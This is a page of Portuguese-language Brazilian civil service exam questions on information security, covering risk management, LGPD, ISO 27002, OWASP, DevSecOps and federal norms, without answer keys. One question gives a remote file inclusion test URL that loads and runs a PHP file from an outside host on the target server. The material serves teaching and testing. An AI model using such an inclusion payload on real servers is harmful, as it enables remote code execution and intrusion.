Questões de Concursos Análise de Vulnerabilidade e Gestão de Riscos

A respeito de governança de segurança da informação e de testes de segurança, julgue o item subsecutivo.

No framework NIST, a categoria proteger envolve os aspectos de gestão de ativos e de avaliação de riscos.

A segurança é uma condição do sistema resultante do estabelecimento e da manutenção das medidas de proteção do sistema. As vulnerabilidades de um sistema podem ser exploradas para violar a sua segurança. Uma medida de proteção básica é configurar um sistema para operar de uma forma que elimine ou mitigue vulnerabilidades conhecidas.
Essa medida de proteção é conhecida como

Considerando que uma abordagem integrada de segurança da informação contempla a proteção de dados pessoais e dos ativos de informação da organização, julgue os itens a seguir, observando, no que couber, as disposições da Lei Geral de Proteção de Dados Pessoais (LGPD) e da ABNT NBR ISO/IEC 27002:2022.

I O tratamento de dados pessoais deve ter propósito legítimo, limitar-se ao mínimo necessário e observar a garantia da prestação de informações claras ao titular.
II A classificação dos ativos de informação de uma organização conforme seu nível de criticidade garante o controle adequado das informações.
III A gestão de riscos em segurança da informação deve considerar a identificação de ameaças, vulnerabilidades e impactos para a definição das medidas de proteção.

Assinale a opção correta.

A gestão de riscos de TIC deve focar exclusivamente a mitigação de ameaças externas, como ataques cibernéticos e falhas de segurança, sem necessidade de considerar riscos internos, como erros operacionais, falhas de infraestrutura ou problemas de conformidade regulatória.

Uma empresa de tecnologia estava planejando lançar um novo serviço de transferência de arquivos em nuvem que envolvia o processamento de dados altamente sensíveis de clientes. Durante a fase de avaliação de segurança deste novo serviço, a equipe identificou uma vulnerabilidade crítica inerente à arquitetura proposta, que não poderia ser mitigada de forma eficaz com as tecnologias atuais e representava um risco inaceitável de vazamento de dados em larga escala. Diante disso, a diretoria decidiu cancelar o desenvolvimento e o lançamento desse serviço específico.
Com base no relato, assinale a opção que identifica corretamente a estratégia de tratamento de risco adotada pela diretoria dessa empresa de tecnologia.

Em um computador, a execução remota de código (RCE) geralmente é permitida devido

O MITRE ATT&CK é um modelo que busca categorizar o comportamento do atacante, com base em apenas dois componentes principais: táticas e procedimentos.

DevSecOps é uma abordagem que integra segurança ao ciclo de vida do desenvolvimento de software, garantindo que vulnerabilidades sejam identificadas e corrigidas desde as primeiras etapas do processo. Uma das características dessa abordagem é a

A fim de identificar vulnerabilidades e entender o algoritmo criptográfico, foi realizada a análise de um firmware embarcado proprietário, compilado para uma arquitetura customizada RISC com instruções não padrão (ISA extension), que implementa rotinas criptográficas e anti-depuração avançadas, incluindo anti-tampering e control flow flattening, além de otimizações de compilador de tempo de ligação.
A partir da situação hipotética precedente, julgue os itens que se seguem.
O control flow flattening implementado no firmware pode ser eficientemente revertido por meio de técnicas de análise estática de descompiladores que utilizam algoritmos de reconhecimento de padrões baseados em grafos de fluxo de controle, restaurando o fluxo de execução original sem a necessidade de taint analysis ou execução simbólica.

No DevSecOps, diversas ferramentas são utilizadas para a segurança do software durante todo o ciclo de desenvolvimento. Uma das práticas dessa abordagem consiste na

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

Segundo o documento OWASP Top 10 vulnerabilities de 2021, o design inseguro é uma categoria ampla que representa diferentes fraquezas que são expressas como "design de controle ausente ou ineficaz". O documento destaca que há uma diferença entre design inseguro e implementação insegura e distingue entre falhas de design e defeitos de implementação, pois eles têm diferentes causas e remediações. Um design seguro pode ter defeitos de implementação que levam a vulnerabilidades que podem ser exploradas. Um design inseguro não pode ser corrigido por uma implementação segura, pois, por definição, os controles de segurança necessários nunca foram criados para se defender contra ataques específicos. Avalie se as formas de prevenção contra o design inseguro expressas no OWASP, incluem:

I. Estabelecer e usar um ciclo de vida de desenvolvimento seguro com profissionais de AppSec para ajudar a avaliar e projetar controles relacionados à segurança e privacidade e estabelecer e utilizar uma biblioteca de padrões de projeto seguros.

II. Escrever testes unitários e de integração para validar se todos os fluxos críticos são resistentes ao modelo de ameaça e compilar casos de uso e casos de uso incorreto para cada camada do aplicativo.

III. Unificar os controles de segurança em histórias de usuários e restringir verificações de plausibilidade em cada camada do seu aplicativo (do frontend ao backend) ao time de design e limitar o consumo de recursos computacionais por usuário ou serviço.


Está correto o que se afirma em

Karen é funcionária pública do Ministério Público da União (MPU) e foi designada para determinar e implementar controles de acordo com a Norma ABNT NBR ISO/IEC 27002:2022 para tratamento de riscos de segurança da informação em um sistema de gestão de segurança da informação (SGSI) do MPU, baseado na ABNT NBR ISO/IEC 27001. Entretanto, para iniciar esse processo, Karen precisará determinar, junto com a organização, os requisitos de segurança necessários para atender a demanda do MPU.
Para identificar esses requisitos, as principais fontes de requisitos, segundo a Norma ABNT NBR ISO/IEC 27002:2022, observadas por Karen, são:

A norma complementar nº 04/IN01/DSIC/GSIPR descreve uma abordagem sistemática do processo de gestão de riscos de segurança da informação e comunicações, com o objetivo de manter os riscos em níveis aceitáveis.
De acordo com essa sistemática, a etapa Aceitação do Risco consiste em

Segundo a norma complementar nº 04/IN01/DSIC/GSIPR, convém que o processo de Gestão de Riscos de Segurança da Informação e Comunicações

O gerenciamento de incidentes de segurança em redes de computadores realizado pelas Equipes de Tratamento e Resposta a Incidentes de Segurança em Redes Computacionais (ETIR) dos órgãos e entidades da administração pública federal é disciplinado pela norma complementar 08/IN01/DSIC/GSIPR.
De acordo com essa norma, além do serviço de tratamento de incidentes, a ETIR poderá oferecer à sua comunidade o serviço de

De acordo com a norma NBR ISO/IEC 27005:2011, as vulnerabilidades podem ser classificadas quanto ao tipo de ativo secundário ao qual elas se aplicam: de hardware, de software, de rede, de __________, de instalações e da estrutura organizacional.
Assinale a alternativa que preenche corretamente a lacuna do trecho acima.